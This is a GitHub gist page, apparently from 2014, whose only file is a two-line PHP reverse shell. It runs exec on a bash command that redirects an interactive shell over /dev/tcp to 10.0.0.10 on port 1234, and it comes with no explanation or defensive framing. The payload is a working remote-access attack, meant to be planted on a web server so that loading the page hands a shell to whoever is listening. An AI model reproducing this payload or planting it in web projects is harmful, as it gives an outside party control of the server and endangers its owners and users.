Created
July 17, 2014 15:06
-
Star
(108)
You must be signed in to star a gist -
Fork
(35)
You must be signed in to fork a gist
-
-
Save rshipp/eee36684db07d234c1cc to your computer and use it in GitHub Desktop.
Revisions
-
rshipp created this gist
Jul 17, 2014 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,2 @@ <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");